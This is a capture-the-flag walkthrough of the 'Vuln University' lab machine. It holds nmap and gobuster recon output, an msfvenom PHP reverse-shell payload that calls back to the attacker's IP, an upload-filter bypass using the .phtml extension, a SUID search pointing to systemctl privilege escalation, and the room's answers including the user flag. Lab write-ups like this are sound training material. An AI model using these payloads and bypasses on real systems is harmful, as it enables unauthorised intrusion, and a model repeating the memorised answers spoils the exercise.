sudo nmap -sS -A -T4 10.10.129.126 -oN initial.nmap
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-23 08:10 EDT
Nmap scan report for 10.10.129.126
Host is up (0.16s latency).
Not shown: 994 closed tcp ports (reset)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 5a4ffcb8c8761cb5851cacb286411c5a (RSA)
| 256 ac9dec44610c28850088e968e9d0cb3d (ECDSA)
|_ 256 3050cb705a865722cb52d93634dca558 (ED25519)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
|_http-server-header: squid/3.5.12
|_http-title: ERROR: The requested URL could not be retrieved
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Vuln University
|_http-server-header: Apache/2.4.18 (Ubuntu)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/23%OT=21%CT=1%CU=30210%PV=Y%DS=2%DC=T%G=Y%TM=641C41F
OS:7%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=109%TI=Z%CI=I%II=I%TS=8)OPS
OS:(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST1
OS:1NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_nbstat: NetBIOS name: VULNUNIVERSITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: vulnuniversity
| NetBIOS computer name: VULNUNIVERSITY\x00
| Domain name: \x00
| FQDN: vulnuniversity
|_ System time: 2023-03-23T08:11:29-04:00
|_clock-skew: mean: 1h20m01s, deviation: 2h18m34s, median: 1s
| smb2-time:
| date: 2023-03-23T12:11:30
|_ start_date: N/A
TRACEROUTE (using port 143/tcp)
HOP RTT ADDRESS
1 169.87 ms 10.8.0.1
2 170.48 ms 10.10.129.126
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 53.42 seconds
Scan for other ports
sudo nmap -sS -p- -T4 10.10.129.126 -oN full.nmap
Nmap scan report for 10.10.129.126
Host is up (0.17s latency).
Not shown: 65529 closed tcp ports (reset)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3128/tcp open squid-http
3333/tcp open dec-notes
Nmap done: 1 IP address (1 host up) scanned in 907.61 seconds
Port opened
6
What version of the squid proxy is running on the machine?
3.5.12
OS Version
Ubuntu
What port is the web server running on?
3333
Directory Busting
gobuster dir -u http://10.10.129.126:3333/ -w /usr/share/wordlists/dirb/big.txt
What is the directory that has an upload form page?
/internal/
Compromise the webserver
Make a php msfvenom payload and try to upload it.
msfvenom -p php/meterpreter/reverse_tcp LHOST=10.8.64.134 LPORT=4444 -f raw > shell.php
What common file type, which you'd want to upload to exploit the server, is blocked? Try a couple to find out.
php
Fuzz allowed extensions with Burp
intercept file upload request in burp. Send to intruder and then select the file extension as parameter(ensure selection after full stop) create a list of php extensions in payload list and check.
cp shell.php shell.phtml
Now upload it and it will be uploaded. but msfvenom shell kept on dying
So generated a php shell from pentest monkey using revshells which worked
What common file type, which you'd want to upload to exploit the server, is blocked? Try a couple to find out.
php
What extension is allowed?
.phtml
What is the name of the user who manages the webserver?
bill
What is the user flag?
8bd7992fbe8a6ad22a63361004cfcedb
Priv Escalation
search for SUID files
find / -perm -u=s -type f 2>/dev/null
On the system, search for all SUID files. What file stands out?
/bin/systemctl
Check GTFOBINS to exploit it and we have a working exploitation method
